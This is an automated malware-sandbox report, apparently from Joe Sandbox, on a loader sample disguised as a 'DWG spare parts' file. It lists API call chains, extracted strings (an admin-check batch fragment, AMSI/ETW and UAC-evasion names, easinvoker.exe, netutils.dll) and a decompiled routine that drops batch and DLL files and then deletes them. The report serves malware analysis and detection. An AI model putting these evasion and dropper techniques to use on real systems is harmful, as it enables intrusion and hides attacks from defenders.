                                                                0x025286e2
                                                                0x02528700
                                                                0x02528718
                                                                0x02528723
                                                                0x0252872a
                                                                0x0252872d
                                                                0x0252872f
                                                                0x02528732
                                                                0x02528735
                                                                0x0252873a
                                                                0x02528744
                                                                0x02527ea9
                                                                0x02527ea9
                                                                0x02527eae
                                                                0x02527eb4
                                                                0x02527ec4
                                                                0x02527edc
                                                                0x02527ee7
                                                                0x02527eee
                                                                0x02527ef9
                                                                0x02527f11
                                                                0x02527f1c
                                                                0x02527f1d
                                                                0x02527f22
                                                                0x02527f27
                                                                0x02527f2d
                                                                0x02527f3d
                                                                0x02527f55
                                                                0x02527f60
                                                                0x02527f67
                                                                0x02527f72
                                                                0x02527f8a
                                                                0x02527f95
                                                                0x02527f96
                                                                0x02527f9b
                                                                0x02527fa0
                                                                0x02527fa6
                                                                0x02527fb6
                                                                0x02527fce
                                                                0x02527fd9
                                                                0x02527fe0
                                                                0x02527feb
                                                                0x02528003
                                                                0x0252800e
                                                                0x0252800f
                                                                0x02528014
                                                                0x0252801a
                                                                0x0252801f
                                                                0x0252802f
                                                                0x02528046
                                                                0x0252804b
                                                                0x02528051
                                                                0x02528056
                                                                0x0252805c
                                                                0x0252806c
                                                                0x02528083
                                                                0x02528088
                                                                0x0252808e
                                                                0x02528093

                                                                APIs
                                                                  • Part of subcall function 025236CC: GetModuleHandleA.KERNEL32(00000000,00000000,02523792), ref: 02523725
                                                                  • Part of subcall function 025236CC: GetProcAddress.KERNEL32(77CD0000,00000000), ref: 02523748
                                                                  • Part of subcall function 025236CC: FreeLibrary.KERNEL32(77CD0000,00000000,00000000,02523792), ref: 02523772
                                                                  • Part of subcall function 02512FC4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000), ref: 02512FE8
                                                                  • Part of subcall function 02512FC4: GetCommandLineA.KERNEL32(?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000,0252A8DA), ref: 02512FFA
                                                                  • Part of subcall function 025134CC: GetFileSize.KERNEL32(0001D7B0,00000000,?,?,02526CF6,ScanBuffer,0252AD5C,OpenSession,0252AD5C,ScanBuffer,0252AD5C,0256D8E0,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 025134E8
                                                                • Sleep.KERNEL32(000001F4,ScanBuffer,0252AD5C,OpenSession,0252AD5C,ScanBuffer,0252AD5C,0256D8E0,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C), ref: 02526DF0
                                                                  • Part of subcall function 0252521C: InternetOpenA.WININET(lVali,00000004,00000000,00000000,00000000), ref: 0252522C
                                                                  • Part of subcall function 0252521C: InternetOpenUrlA.WININET(00CC0004,00000000,00000000,00000000,00000200,00000000), ref: 0252524F
                                                                  • Part of subcall function 0252521C: InternetCloseHandle.WININET(00CC0004), ref: 025252E1
                                                                • Sleep.KERNEL32(000001F4,ScanBuffer,0252AD5C,OpenSession,0252AD5C,ScanBuffer,0252AD5C,0256D8E0,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C), ref: 02526F3D
                                                                  • Part of subcall function 02525974: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 025259B8
                                                                  • Part of subcall function 02525974: InternetOpenUrlA.WININET(00CC0004,00000000,00000000,00000000,04000000,00000000), ref: 025259F6
                                                                  • Part of subcall function 02525974: InternetReadFile.WININET(00CC000C,0256D4D4,00000401,0256D8D8), ref: 02525A2C
                                                                  • Part of subcall function 02525974: InternetCloseHandle.WININET(00CC000C), ref: 02525A6F
                                                                  • Part of subcall function 02518134: GetFileAttributesA.KERNEL32(00000000,?,0252752B,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,ScanString,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession), ref: 0251813F
                                                                  • Part of subcall function 025182C8: CreateDirectoryA.KERNEL32(00000000,00000000,?,02527551,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,ScanString,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 025182D5
                                                                  • Part of subcall function 02518110: GetFileAttributesA.KERNEL32(00000000,?,02526AA4,ScanBuffer,0252AD5C,0256D8E0,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000,0252A8DA), ref: 0251811B
                                                                • CopyFileA.KERNEL32(00000000,00000000,000000FF), ref: 02527929
                                                                  • Part of subcall function 02525698: _lcreat.KERNEL32(00000000,00000000), ref: 025256CF
                                                                  • Part of subcall function 02525698: _lwrite.KERNEL32(00000000,00000000,?,00000000,02525715), ref: 025256EF
                                                                  • Part of subcall function 02525698: _lclose.KERNEL32(00000000), ref: 025256F5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Internet$File$Open$Handle$AttributesCloseModuleSleep$AddressCommandCopyCreateDirectoryFreeLibraryLineNameProcReadSize_lclose_lcreat_lwrite
                                                                • String ID: @echo offset mypath=%cd%if "%~1" equ "" (set saka=%mypath%\Cdex.bat) ELSE set "saka=%~1"net session >nul 2>&1 || goto :label%saka% exit /b 2:label::REQUIREMENTSwhoami /groups|findstr /i "\<S-1-5-32-544\>" >nul 2>&1if ERRORLEVEL 1 exit /b 1::Wi$ & exit$.exe$.url$217$5E5CDDEE$AccessCheckByType$BuildImpersonateTrusteeW$BuildSecurityDescriptorA$BuildSecurityDescriptorW$C:\Users\Public\Libraries$C:\Windows\SysWOW64$Cdex.bat$CopyFileA$CryptSIPCreateIndirectData$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DllGetClassObject$DT$ElfOpenEventLogA$ElfOpenEventLogW$ElfReadEventLogA$ElfReadEventLogW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$GetEventLogInformation$HotKey=$IconIndex=$Initialize$InternetOpenUrlA$InternetOpenW$InternetReadFile$NotifyChangeEventLog$NtCreateFile$NtOpenFile$Null$O.bat$OpenEventLogA$OpenEventLogW$OpenSession$ReadEventLogA$ReadEventLogW$ReportEventA$ReportEventW$SaferRecordEventLogEntry$SaferSetLevelInformation$SaferSetPolicyInformation$ScanBuffer$ScanString$SetFileSecurityA$SetFileSecurityW$SetKernelObjectSecurity$SetPrivateObjectSecurityEx$SetSecurityAccessMask$SetSecurityInfo$SetSecurityInfoExA$SetSecurityInfoExW$SetTraceCallback$ShellExecuteExA$SoftpubCheckCert$SoftpubDefCertInit$SoftpubInitialize$SuspendThread$SystemFunction035$TraceEvent$TraceEventInstance$TraceMessage$TraceMessageVa$TraceQueryInformation$TraceSetInformation$URL=file:"$UacInitialize$UacScan$WmiNotificationRegistrationW$WmiOpenBlock$WmiQueryAllDataA$WmiQuerySingleInstanceW$WmiReceiveNotificationsA$WmiReceiveNotificationsW$Ymo_^$[InternetShortcut]$^^Nc$advapi32$iexpress$iexpress.exe$kernel32$mssip32$ntdll$shell32$softpub$start /min $t.bat$wininet$wuapi
                                                                • API String ID: 1450581692-2335470602
                                                                • Opcode ID: 7480d79896530bc2fc1a669c062ef11e53fdfc37427f6c8d0d39b00f8c6e0273
                                                                • Instruction ID: 7ab1e13891585dd01a46f2beb726d4c99d88bdb66d02664ec80f61871ef3950f
                                                                • Opcode Fuzzy Hash: 7480d79896530bc2fc1a669c062ef11e53fdfc37427f6c8d0d39b00f8c6e0273
                                                                • Instruction Fuzzy Hash: 5A730075B0112A9BEB11EB64D880ADE73B7FFC5300F5198E59408A7290DE34AE89DF5C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                C-Code - Quality: 52%
                                                                			E0252874D(void* __eax, intOrPtr __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                				intOrPtr _t577;
                                                                				intOrPtr _t588;
                                                                				intOrPtr _t613;
                                                                				intOrPtr _t624;
                                                                				intOrPtr _t626;
                                                                				void* _t631;
                                                                				intOrPtr _t674;
                                                                				intOrPtr _t678;
                                                                				void* _t679;
                                                                				intOrPtr _t680;
                                                                				intOrPtr _t684;
                                                                				intOrPtr _t760;
                                                                				intOrPtr _t776;
                                                                				intOrPtr _t792;
                                                                				intOrPtr _t1286;
                                                                				intOrPtr _t1288;
                                                                				void* _t1322;
                                                                				void* _t1323;
                                                                				intOrPtr _t1325;
                                                                				intOrPtr _t1327;
                                                                				long _t1360;
                                                                				intOrPtr _t1362;
                                                                				void* _t1378;
                                                                				intOrPtr _t1379;
                                                                				intOrPtr _t1458;
                                                                				intOrPtr _t1460;
                                                                				intOrPtr _t1570;
                                                                				intOrPtr _t1576;
                                                                				intOrPtr _t1584;
                                                                				intOrPtr _t1592;
                                                                				intOrPtr _t1600;
                                                                				intOrPtr _t1608;
                                                                				intOrPtr _t1616;
                                                                				int _t1623;
                                                                				char _t1624;
                                                                				intOrPtr _t1633;
                                                                				intOrPtr _t1636;
                                                                				intOrPtr _t1637;
                                                                				intOrPtr _t1638;
                                                                				intOrPtr _t1641;
                                                                				intOrPtr _t1642;
                                                                				intOrPtr _t1643;
                                                                				intOrPtr _t1644;
                                                                				intOrPtr _t1645;
                                                                				intOrPtr _t1646;
                                                                				intOrPtr _t1647;
                                                                				intOrPtr _t1648;
                                                                				intOrPtr _t1649;
                                                                				intOrPtr _t1650;
                                                                				intOrPtr _t1651;
                                                                				intOrPtr _t1652;
                                                                				intOrPtr _t1653;
                                                                				intOrPtr _t1654;
                                                                				intOrPtr _t1655;
                                                                				intOrPtr _t1658;
                                                                				intOrPtr _t1659;
                                                                				intOrPtr _t1660;
                                                                				intOrPtr _t1661;
                                                                				intOrPtr _t1662;
                                                                				intOrPtr _t1663;
                                                                				intOrPtr _t1664;
                                                                				intOrPtr _t1665;
                                                                				intOrPtr _t1666;
                                                                				intOrPtr _t1667;
                                                                				intOrPtr _t1668;
                                                                				intOrPtr _t1669;
                                                                				intOrPtr _t1670;
                                                                				intOrPtr _t1671;
                                                                				intOrPtr _t1672;
                                                                				intOrPtr _t1678;
                                                                				intOrPtr _t1683;
                                                                				void* _t1688;
                                                                				intOrPtr _t1693;
                                                                				intOrPtr _t1698;
                                                                				void* _t1704;
                                                                				void* _t1709;
                                                                				void* _t1714;
                                                                				intOrPtr _t1715;
                                                                				void* _t1726;
                                                                				void* _t1731;
                                                                				void* _t1736;
                                                                				void* _t1741;
                                                                				void* _t1746;
                                                                				void* _t1752;
                                                                				void* _t1758;
                                                                				void* _t1764;
                                                                				void* _t1767;
                                                                				void* _t1772;
                                                                				void* _t1775;
                                                                				void* _t1780;
                                                                				void* _t1783;
                                                                				void* _t1788;
                                                                				void* _t1791;
                                                                				void* _t1794;
                                                                				void* _t1799;
                                                                				void* _t1804;
                                                                				void* _t1807;
                                                                				void* _t1810;
                                                                				void* _t1813;
                                                                				void* _t1816;
                                                                				void* _t1819;
                                                                				void* _t1822;
                                                                				void* _t1825;
                                                                				void* _t1828;
                                                                				void* _t1831;
                                                                				void* _t1834;
                                                                				void* _t1837;
                                                                				void* _t1840;
                                                                				void* _t1843;
                                                                				void* _t1846;
                                                                				void* _t1849;
                                                                				void* _t1852;
                                                                				void* _t1855;
                                                                				void* _t1858;
                                                                				void* _t1861;
                                                                				void* _t1864;
                                                                				void* _t1867;
                                                                				void* _t1870;
                                                                				void* _t1873;
                                                                				void* _t1876;
                                                                				void* _t1879;
                                                                				void* _t1882;
                                                                				void* _t1885;
                                                                				void* _t1888;
                                                                				void* _t1891;
                                                                				void* _t1894;
                                                                				void* _t1897;
                                                                				void* _t1900;
                                                                				void* _t1903;
                                                                				void* _t1906;
                                                                				void* _t1909;
                                                                				void* _t1912;
                                                                				void* _t1915;
                                                                				void* _t1918;
                                                                				void* _t1921;
                                                                				void* _t1924;
                                                                				void* _t1929;
                                                                				void* _t1934;
                                                                				void* _t1937;
                                                                				void* _t1940;
                                                                				void* _t1943;
                                                                				void* _t1946;
                                                                				intOrPtr _t1947;
                                                                				intOrPtr _t1955;
                                                                				intOrPtr _t1957;
                                                                				intOrPtr _t1959;
                                                                				void* _t1969;
                                                                				void* _t1974;
                                                                				void* _t1983;
                                                                				void* _t1988;
                                                                				void* _t1993;
                                                                				void* _t1999;
                                                                				void* _t2002;
                                                                				void* _t2007;
                                                                				void* _t2010;
                                                                				void* _t2015;
                                                                				void* _t2018;
                                                                				void* _t2023;
                                                                				void* _t2030;
                                                                				void* _t2035;
                                                                				void* _t2040;
                                                                				void* _t2043;
                                                                				void* _t2048;
                                                                				void* _t2051;
                                                                				void* _t2056;
                                                                				void* _t2059;
                                                                				void* _t2064;
                                                                				void* _t2075;
                                                                				char _t2084;
                                                                
                                                                				_t2087 = __fp0;
                                                                				_t2074 = __esi;
                                                                				_t2073 = __edi;
                                                                				_t1625 = __ebx;
                                                                				_push(0x252ae60);
                                                                				_push("easinvoker.exe");
                                                                				E02514C24();
                                                                				E02514A98(0x256d8e4, E02514D64( *((intOrPtr*)(_t2075 - 0x648))));
                                                                				E02525540(0x252e4f0, _t2075 - 0x64c, 0x2023f);
                                                                				E025148F4(0x256dccc,  *((intOrPtr*)(_t2075 - 0x64c)));
                                                                				_t1678 =  *0x256d8e4; // 0x0
                                                                				_t577 =  *0x256dccc; // 0x0
                                                                				E02525698(_t577, __ebx, _t1678, __esi);
                                                                				_push( *0x256da90);
                                                                				_push(0x252ae60);
                                                                				_push( *0x256dcf8);
                                                                				_push("O.bat");
                                                                				E02514C24();
                                                                				E02514A98(0x256d8ec, E02514D64( *((intOrPtr*)(_t2075 - 0x650))));
                                                                				E02525540(0x254e730, _t2075 - 0x654, 0x19a);
                                                                				E025148F4(0x256dccc,  *((intOrPtr*)(_t2075 - 0x654)));
                                                                				_t1683 =  *0x256d8ec; // 0x0
                                                                				_t588 =  *0x256dccc; // 0x0
                                                                				E02525698(_t588, __ebx, _t1683, __esi);
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("ScanString");
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0x658, E02514D64( *((intOrPtr*)(_t2075 - 0x65c))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0x658)));
                                                                				_t1633 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0x664, _t1633, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0x660, E02514D64( *((intOrPtr*)(_t2075 - 0x664))));
                                                                				_pop(_t1688);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x660)), _t1625, _t1688, _t2074);
                                                                				_push( *0x256da90);
                                                                				_push(0x252ae60);
                                                                				_push("netutils.dll");
                                                                				E02514C24();
                                                                				E02514A98(0x256d8e8, E02514D64( *((intOrPtr*)(_t2075 - 0x668))));
                                                                				E02525540(0x254e8cc, _t2075 - 0x66c, 0x1b32c);
                                                                				E025148F4(0x256dccc,  *((intOrPtr*)(_t2075 - 0x66c)));
                                                                				_t1693 =  *0x256d8e8; // 0x0
                                                                				_t613 =  *0x256dccc; // 0x0
                                                                				E02525698(_t613, _t1625, _t1693, _t2074);
                                                                				_push( *0x256da90);
                                                                				_push(0x252ae60);
                                                                				_push("KDECO.bat");
                                                                				E02514C24();
                                                                				E02514A98(0x256dcd4, E02514D64( *((intOrPtr*)(_t2075 - 0x670))));
                                                                				E02525540(0x252e004, _t2075 - 0x674, 0x9a);
                                                                				E025148F4(0x256dccc,  *((intOrPtr*)(_t2075 - 0x674)));
                                                                				_t1698 =  *0x256dcd4; // 0x0
                                                                				_t624 =  *0x256dccc; // 0x0
                                                                				E02525698(_t624, _t1625, _t1698, _t2074);
                                                                				_t626 =  *0x256d8ec; // 0x0
                                                                				E02514A98(_t2075 - 0x678, E02514D64(_t626));
                                                                				_t631 = E02518110( *((intOrPtr*)(_t2075 - 0x678)));
                                                                				_t2077 = _t631;
                                                                				if(_t631 != 0) {
                                                                					_push(0x252ad5c);
                                                                					_push( *0x256dcd8);
                                                                					_push("ScanBuffer");
                                                                					E02514C24();
                                                                					E02514A98(_t2075 - 0x67c, E02514D64( *((intOrPtr*)(_t2075 - 0x680))));
                                                                					_push( *((intOrPtr*)(_t2075 - 0x67c)));
                                                                					_t1672 =  *0x256dcd8; // 0x2a51b38
                                                                					E02514BB0(_t2075 - 0x688, _t1672, 0x252ad5c);
                                                                					E02514A98(_t2075 - 0x684, E02514D64( *((intOrPtr*)(_t2075 - 0x688))));
                                                                					_pop(_t2064);
                                                                					E025236CC( *((intOrPtr*)(_t2075 - 0x684)), _t1625, _t2064, _t2074);
                                                                					_t1570 =  *0x256d8ec; // 0x0
                                                                					E02514D64(_t1570);
                                                                					E025137AC();
                                                                					E02525724(_t2075 - 0x5f0, _t1625, 0, 0x252afa8, __edi, _t2074, _t2077, __fp0);
                                                                					Sleep(0x1388);
                                                                					_t1576 =  *0x256d8e4; // 0x0
                                                                					E02514A98(_t2075 - 0x68c, E02514D64(_t1576));
                                                                					 *((intOrPtr*)(_t2075 - 0x230)) =  *((intOrPtr*)(_t2075 - 0x68c));
                                                                					DeleteFileA(E02514D64( *((intOrPtr*)(_t2075 - 0x230))));
                                                                					asm("sbb eax, eax");
                                                                					_t1584 =  *0x256da54; // 0x0
                                                                					E02514A98(_t2075 - 0x690, E02514D64(_t1584));
                                                                					 *((intOrPtr*)(_t2075 - 0x230)) =  *((intOrPtr*)(_t2075 - 0x690));
                                                                					DeleteFileA(E02514D64( *((intOrPtr*)(_t2075 - 0x230))));
                                                                					asm("sbb eax, eax");
                                                                					_t1592 =  *0x256da58; // 0x0
                                                                					E02514A98(_t2075 - 0x694, E02514D64(_t1592));
                                                                					 *((intOrPtr*)(_t2075 - 0x230)) =  *((intOrPtr*)(_t2075 - 0x694));
                                                                					DeleteFileA(E02514D64( *((intOrPtr*)(_t2075 - 0x230))));
                                                                					asm("sbb eax, eax");
                                                                					_t1600 =  *0x256dcd4; // 0x0
                                                                					E02514A98(_t2075 - 0x698, E02514D64(_t1600));
                                                                					 *((intOrPtr*)(_t2075 - 0x230)) =  *((intOrPtr*)(_t2075 - 0x698));
                                                                					DeleteFileA(E02514D64( *((intOrPtr*)(_t2075 - 0x230))));
                                                                					asm("sbb eax, eax");
                                                                					_t1608 =  *0x256d8ec; // 0x0
                                                                					E02514A98(_t2075 - 0x69c, E02514D64(_t1608));
                                                                					_t1625 =  *((intOrPtr*)(_t2075 - 0x69c));
                                                                					 *((intOrPtr*)(_t2075 - 0x230)) =  *((intOrPtr*)(_t2075 - 0x69c));
                                                                					DeleteFileA(E02514D64( *((intOrPtr*)(_t2075 - 0x230))));
                                                                					asm("sbb eax, eax");
                                                                					_t1616 =  *0x256d8e8; // 0x0
                                                                					E02514A98(_t2075 - 0x6a0, E02514D64(_t1616));
                                                                					 *((intOrPtr*)(_t2075 - 4)) =  *((intOrPtr*)(_t2075 - 0x6a0));
                                                                					_t1623 = DeleteFileA(E02514D64( *((intOrPtr*)(_t2075 - 4))));
                                                                					asm("sbb eax, eax");
                                                                					_t1624 = _t1623 + 1;
                                                                					_t2084 = _t1624;
                                                                					 *((char*)(_t2075 - 5)) = _t1624;
                                                                				}
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("Initialize");
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0x6a4, E02514D64( *((intOrPtr*)(_t2075 - 0x6a8))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0x6a4)));
                                                                				_t1636 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0x6b0, _t1636, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0x6ac, E02514D64( *((intOrPtr*)(_t2075 - 0x6b0))));
                                                                				_pop(_t1704); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x6ac)), _t1625, _t1704, _t2074); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("OpenSession");
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0x6b4, E02514D64( *((intOrPtr*)(_t2075 - 0x6b8))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0x6b4)));
                                                                				_t1637 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0x6c0, _t1637, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0x6bc, E02514D64( *((intOrPtr*)(_t2075 - 0x6c0))));
                                                                				_pop(_t1709); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x6bc)), _t1625, _t1709, _t2074); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("ScanString");
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0x6c4, E02514D64( *((intOrPtr*)(_t2075 - 0x6c8))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0x6c4)));
                                                                				_t1638 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0x6d0, _t1638, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0x6cc, E02514D64( *((intOrPtr*)(_t2075 - 0x6d0))));
                                                                				_pop(_t1714); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x6cc)), _t1625, _t1714, _t2074); // executed
                                                                				_t1715 =  *0x256dd00; // 0x2a1f418
                                                                				_t674 =  *0x256da80; // 0x7f190018, executed
                                                                				E02525580(_t674, _t1625, _t2075 - 0x6d4, _t1715, _t2073, _t2074); // executed
                                                                				E025148F4(0x256da48,  *((intOrPtr*)(_t2075 - 0x6d4)));
                                                                				_t678 =  *0x256dcf0; // 0x2a51bb8
                                                                				_t679 = E02517DA0(_t678, _t2084);
                                                                				_t1640 = _t2075 - 0x6d8;
                                                                				_t680 =  *0x256da48; // 0x7f210018
                                                                				E02525B34(_t680, _t1625, _t2075 - 0x6d8, _t679, _t2074);
                                                                				E025148F4(0x256da4c,  *((intOrPtr*)(_t2075 - 0x6d8)));
                                                                				_t684 =  *0x256da4c; // 0x7f110018
                                                                				E02525AC0(_t684, _t1625, _t2075 - 0x6d8, _t2075 - 0x6e0, _t2073, _t2074);
                                                                				E02525910( *((intOrPtr*)(_t2075 - 0x6e0)), _t1640, _t2075 - 0x6dc);
                                                                				E025148F4(0x256da84,  *((intOrPtr*)(_t2075 - 0x6dc)));
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("Initialize");
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0x6e4, E02514D64( *((intOrPtr*)(_t2075 - 0x6e8))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0x6e4)));
                                                                				_t1641 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0x6f0, _t1641, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0x6ec, E02514D64( *((intOrPtr*)(_t2075 - 0x6f0))));
                                                                				_pop(_t1726); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x6ec)), _t1625, _t1726, _t2074); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("OpenSession");
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0x6f4, E02514D64( *((intOrPtr*)(_t2075 - 0x6f8))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0x6f4)));
                                                                				_t1642 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0x700, _t1642, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0x6fc, E02514D64( *((intOrPtr*)(_t2075 - 0x700))));
                                                                				_pop(_t1731); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x6fc)), _t1625, _t1731, _t2074); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("UacScan");
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0x704, E02514D64( *((intOrPtr*)(_t2075 - 0x708))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0x704)));
                                                                				_t1643 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0x710, _t1643, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0x70c, E02514D64( *((intOrPtr*)(_t2075 - 0x710))));
                                                                				_pop(_t1736); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x70c)), _t1625, _t1736, _t2074); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("UacInitialize");
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0x714, E02514D64( *((intOrPtr*)(_t2075 - 0x718))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0x714)));
                                                                				_t1644 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0x720, _t1644, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0x71c, E02514D64( *((intOrPtr*)(_t2075 - 0x720))));
                                                                				_pop(_t1741); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x71c)), _t1625, _t1741, _t2074); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("ScanString");
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0x724, E02514D64( *((intOrPtr*)(_t2075 - 0x728))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0x724)));
                                                                				_t1645 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0x730, _t1645, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0x72c, E02514D64( *((intOrPtr*)(_t2075 - 0x730))));
                                                                				_pop(_t1746); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x72c)), _t1625, _t1746, _t2074);
                                                                				_t760 =  *0x256dcec; // 0x0
                                                                				E02514CB0(_t760, 0x252ae54);
                                                                				if(_t2084 == 0) {
                                                                					_t1458 =  *0x256dce4; // 0x2a51b88
                                                                					E02514CB0(_t1458, 0x252ae54);
                                                                					if(_t2084 != 0) {
                                                                						_t1460 =  *0x256dce8; // 0x0
                                                                						E02514CB0(_t1460, 0x252ae54);
                                                                						if(_t2084 != 0) {
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("ScanBuffer");
                                                                							E02514C24();
                                                                							E02514A98(_t2075 - 0x734, E02514D64( *((intOrPtr*)(_t2075 - 0x738))));
                                                                							_push( *((intOrPtr*)(_t2075 - 0x734)));
                                                                							_t1667 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t2075 - 0x740, _t1667, 0x252ad5c);
                                                                							E02514A98(_t2075 - 0x73c, E02514D64( *((intOrPtr*)(_t2075 - 0x740))));
                                                                							_pop(_t2030);
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x73c)), _t1625, _t2030, _t2074);
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t2075 - 0x744, E02514D64( *((intOrPtr*)(_t2075 - 0x748))));
                                                                							_push( *((intOrPtr*)(_t2075 - 0x744)));
                                                                							_t1668 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t2075 - 0x750, _t1668, 0x252ad5c);
                                                                							E02514A98(_t2075 - 0x74c, E02514D64( *((intOrPtr*)(_t2075 - 0x750))));
                                                                							_pop(_t2035);
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x74c)), _t1625, _t2035, _t2074);
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push(0x252b020);
                                                                							_push(0);
                                                                							_push(0x252b02c);
                                                                							_push(0);
                                                                							_push(0x252b038);
                                                                							_push(0);
                                                                							_push(0x252b044);
                                                                							E02514C24();
                                                                							E02514A98(_t2075 - 0x754, E02514D64( *((intOrPtr*)(_t2075 - 0x758))));
                                                                							_push( *((intOrPtr*)(_t2075 - 0x754)));
                                                                							_t1669 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t2075 - 0x760, _t1669, 0x252ad5c);
                                                                							E02514A98(_t2075 - 0x75c, E02514D64( *((intOrPtr*)(_t2075 - 0x760))));
                                                                							_pop(_t2040);
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x75c)), _t1625, _t2040, _t2074);
                                                                							E02514A98(_t2075 - 0x764, "ReportEventA");
                                                                							_push( *((intOrPtr*)(_t2075 - 0x764)));
                                                                							E02514A98(_t2075 - 0x768, "advapi32");
                                                                							_pop(_t2043);
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x768)), _t1625, _t2043, _t2074);
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t2075 - 0x76c, E02514D64( *((intOrPtr*)(_t2075 - 0x770))));
                                                                							_push( *((intOrPtr*)(_t2075 - 0x76c)));
                                                                							_t1670 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t2075 - 0x778, _t1670, 0x252ad5c);
